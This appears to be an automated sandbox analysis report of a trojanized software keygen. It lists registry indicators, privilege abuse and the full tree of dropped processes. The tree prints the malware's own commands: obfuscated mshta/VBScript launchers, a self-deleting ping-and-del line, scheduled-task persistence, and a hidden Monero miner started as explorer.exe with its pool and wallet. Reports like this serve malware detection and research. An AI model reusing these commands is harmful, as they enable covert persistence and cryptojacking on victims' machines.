description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 2 IoCs
pid Process 2568 taskkill.exe 5440 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Process not Found Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5512 PING.EXE 4164 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5080 WerFault.exe 5080 WerFault.exe 4608 WerFault.exe 4608 WerFault.exe 4432 WerFault.exe 4432 WerFault.exe 1784 key.exe 1784 key.exe 5060 6254081.exe 5060 6254081.exe 4640 2537520.exe 4640 2537520.exe 4496 WerFault.exe 4496 WerFault.exe 4224 WerFault.exe 4224 WerFault.exe 504 WerFault.exe 504 WerFault.exe 812 WerFault.exe 812 WerFault.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 3524 Setup.exe 2556 chrome3.exe 2556 chrome3.exe 4636 QLOPdlJjYI7MoPRwJxa1bDht.exe 4636 QLOPdlJjYI7MoPRwJxa1bDht.exe 5612 WerFault.exe 5612 WerFault.exe 5168 Z0C9e0hIzHto92rlBJjZT0HV.exe 5168 Z0C9e0hIzHto92rlBJjZT0HV.exe 6072 WerFault.exe 6072 WerFault.exe 3016 WerFault.exe 3016 WerFault.exe 5772 WerFault.exe 5772 WerFault.exe 5712 WerFault.exe 5712 WerFault.exe 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found 3232 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5168 Z0C9e0hIzHto92rlBJjZT0HV.exe 5668 21D2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4612 jhuuee.exe Token: SeDebugPrivilege 4280 2.exe Token: SeDebugPrivilege 5064 PublicDwlBrowser188.exe Token: SeDebugPrivilege 5060 6254081.exe Token: SeRestorePrivilege 5080 WerFault.exe Token: SeBackupPrivilege 5080 WerFault.exe Token: SeBackupPrivilege 5080 WerFault.exe Token: SeDebugPrivilege 4640 2537520.exe Token: SeDebugPrivilege 2568 taskkill.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeManageVolumePrivilege 2348 md1_1eaf.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeImpersonatePrivilege 1784 key.exe Token: SeTcbPrivilege 1784 key.exe Token: SeChangeNotifyPrivilege 1784 key.exe Token: SeCreateTokenPrivilege 1784 key.exe Token: SeBackupPrivilege 1784 key.exe Token: SeRestorePrivilege 1784 key.exe Token: SeIncreaseQuotaPrivilege 1784 key.exe Token: SeAssignPrimaryTokenPrivilege 1784 key.exe Token: SeManageVolumePrivilege 2348 md1_1eaf.exe Token: SeManageVolumePrivilege 2348 md1_1eaf.exe Token: SeManageVolumePrivilege 2348 md1_1eaf.exe Token: SeManageVolumePrivilege 2348 md1_1eaf.exe Token: SeDebugPrivilege 2556 chrome3.exe Token: SeDebugPrivilege 5440 taskkill.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
pid Process 5232 MSIEXEC.EXE 5504 Rimasta.exe.com 5504 Rimasta.exe.com 5504 Rimasta.exe.com 5864 Conhost.exe 5864 Conhost.exe 5864 Conhost.exe 4948 Rimasta.exe.com 4948 Rimasta.exe.com 4948 Rimasta.exe.com 4744 Rimasta.exe.com 4744 Rimasta.exe.com 4744 Rimasta.exe.com 5588 Rimasta.exe.com 5588 Rimasta.exe.com 5588 Rimasta.exe.com 5400 Rimasta.exe.com 5400 Rimasta.exe.com 5400 Rimasta.exe.com -
Suspicious use of SendNotifyMessage 18 IoCs
pid Process 5504 Rimasta.exe.com 5504 Rimasta.exe.com 5504 Rimasta.exe.com 5864 Conhost.exe 5864 Conhost.exe 5864 Conhost.exe 4948 Rimasta.exe.com 4948 Rimasta.exe.com 4948 Rimasta.exe.com 4744 Rimasta.exe.com 4744 Rimasta.exe.com 4744 Rimasta.exe.com 5588 Rimasta.exe.com 5588 Rimasta.exe.com 5588 Rimasta.exe.com 5400 Rimasta.exe.com 5400 Rimasta.exe.com 5400 Rimasta.exe.com -
Suspicious use of SetWindowsHookEx 26 IoCs
pid Process 3524 Setup.exe 1144 wUJlGzFeEH6o0Z1DQAZWu72E.exe 5104 _JId4e8RMtjJlE0E_0myM75Q.exe 5108 B7oBRefKlnvLxTUk7A5247IV.exe 4432 ttc4qfn2w_h5zeVHlPOzh8EN.exe 4636 QLOPdlJjYI7MoPRwJxa1bDht.exe 4108 xM8nfaje063EvkNO1NgonNdg.exe 5036 xPAAlqXyVJs72ZYjY5o9Mv0L.exe 4792 VGzbIkLyVi91CjT1VcFgnzRu.exe 1408 Z0C9e0hIzHto92rlBJjZT0HV.exe 2412 9hc0EGzp2ovANCVqKn_Ta8VP.exe 4688 BBpm_5Q5qrBtb61PhXyaFhcB.exe 1488 NUYBLx5Zp9Uv4LxiycBoW8bN.exe 1044 P8GPV61e4aQH4Yeejcyjhha2.exe 2040 rX0IlY0LeaXpdXrY9k1FvbnV.exe 3436 NUYBLx5Zp9Uv4LxiycBoW8bN.exe 1992 KY2h2nAcmqPEv6bBk71Gi0MC.exe 1636 inst001.exe 5024 cutm3.exe 5504 Rimasta.exe.com 5864 Conhost.exe 4948 Rimasta.exe.com 4744 Rimasta.exe.com 5588 Rimasta.exe.com 5400 Rimasta.exe.com 5428 Rimasta.exe.com -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3232 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3552 wrote to memory of 3856 3552 Dot.Tk.123.ticket.keygen.by.CORE.bin.exe 79 PID 3552 wrote to memory of 3856 3552 Dot.Tk.123.ticket.keygen.by.CORE.bin.exe 79 PID 3552 wrote to memory of 3856 3552 Dot.Tk.123.ticket.keygen.by.CORE.bin.exe 79 PID 3856 wrote to memory of 4548 3856 cmd.exe 83 PID 3856 wrote to memory of 4548 3856 cmd.exe 83 PID 3856 wrote to memory of 4548 3856 cmd.exe 83 PID 3856 wrote to memory of 2208 3856 cmd.exe 84 PID 3856 wrote to memory of 2208 3856 cmd.exe 84 PID 3856 wrote to memory of 2208 3856 cmd.exe 84 PID 3856 wrote to memory of 3060 3856 cmd.exe 85 PID 3856 wrote to memory of 3060 3856 cmd.exe 85 PID 3856 wrote to memory of 3060 3856 cmd.exe 85 PID 3856 wrote to memory of 4432 3856 cmd.exe 86 PID 3856 wrote to memory of 4432 3856 cmd.exe 86 PID 3856 wrote to memory of 4432 3856 cmd.exe 86 PID 3856 wrote to memory of 3612 3856 cmd.exe 87 PID 3856 wrote to memory of 3612 3856 cmd.exe 87 PID 3856 wrote to memory of 3612 3856 cmd.exe 87 PID 4548 wrote to memory of 1784 4548 keygen-pr.exe 88 PID 4548 wrote to memory of 1784 4548 keygen-pr.exe 88 PID 4548 wrote to memory of 1784 4548 keygen-pr.exe 88 PID 4432 wrote to memory of 2112 4432 Process not Found 89 PID 4432 wrote to memory of 2112 4432 Process not Found 89 PID 4432 wrote to memory of 2112 4432 Process not Found 89 PID 3612 wrote to memory of 4612 3612 keygen-step-4.exe 104 PID 3612 wrote to memory of 4612 3612 keygen-step-4.exe 104 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 1784 wrote to memory of 2464 1784 key.exe 91 PID 3612 wrote to memory of 1312 3612 keygen-step-4.exe 95 PID 3612 wrote to memory of 1312 3612 keygen-step-4.exe 95 PID 3612 wrote to memory of 1312 3612 keygen-step-4.exe 95 PID 1312 wrote to memory of 1880 1312 Crack.exe 97 PID 1312 wrote to memory of 1880 1312 Crack.exe 97 PID 1312 wrote to memory of 1880 1312 Crack.exe 97 PID 3612 wrote to memory of 2512 3612 keygen-step-4.exe 99 PID 3612 wrote to memory of 2512 3612 keygen-step-4.exe 99 PID 3612 wrote to memory of 2512 3612 keygen-step-4.exe 99 PID 2512 wrote to memory of 2556 2512 PBrowFile28.exe 100 PID 2512 wrote to memory of 2556 2512 PBrowFile28.exe 100 PID 2512 wrote to memory of 5064 2512 PBrowFile28.exe 101 PID 2512 wrote to memory of 5064 2512 PBrowFile28.exe 101 PID 2512 wrote to memory of 4280 2512 PBrowFile28.exe 102 PID 2512 wrote to memory of 4280 2512 PBrowFile28.exe 102 PID 2512 wrote to memory of 4356 2512 PBrowFile28.exe 103 PID 2512 wrote to memory of 4356 2512 PBrowFile28.exe 103 PID 2512 wrote to memory of 4356 2512 PBrowFile28.exe 103 PID 2512 wrote to memory of 4612 2512 PBrowFile28.exe 104 PID 2512 wrote to memory of 4612 2512 PBrowFile28.exe 104 PID 3612 wrote to memory of 2348 3612 keygen-step-4.exe 105 PID 3612 wrote to memory of 2348 3612 keygen-step-4.exe 105 PID 3612 wrote to memory of 2348 3612 keygen-step-4.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe"C:\Users\Admin\AppData\Local\Temp\Dot.Tk.123.ticket.keygen.by.CORE.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2208
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
- Executes dropped EXE
PID:3060 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL4⤵PID:1496
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:4164
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:4432 -
C:\Windows\winnetdriv.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe" 1631432369 04⤵
- Executes dropped EXE
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"4⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe" -a5⤵
- Executes dropped EXE
PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\PBrowFile28.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\PBrowFile28.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit6⤵PID:1560
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'7⤵
- Creates scheduled task(s)
PID:5952
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵PID:3176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5864
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
PID:4620
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵PID:5396
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth7⤵PID:5000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5064 -
C:\ProgramData\6254081.exe"C:\ProgramData\6254081.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5060 -s 22967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4496
-
-
-
C:\ProgramData\3711423.exe"C:\ProgramData\3711423.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3932 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
PID:4048
-
-
-
C:\ProgramData\6817322.exe"C:\ProgramData\6817322.exe"6⤵
- Executes dropped EXE
PID:4624 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\6817322.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\6817322.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))7⤵PID:3948
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\6817322.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\6817322.exe") do taskkill -Im "%~nxl" /F8⤵PID:5108
-
C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exEC3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw99⤵
- Executes dropped EXE
PID:1460 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))10⤵PID:4704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F11⤵PID:1724
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY10⤵
- Loads dropped DLL
PID:3852
-
-
-
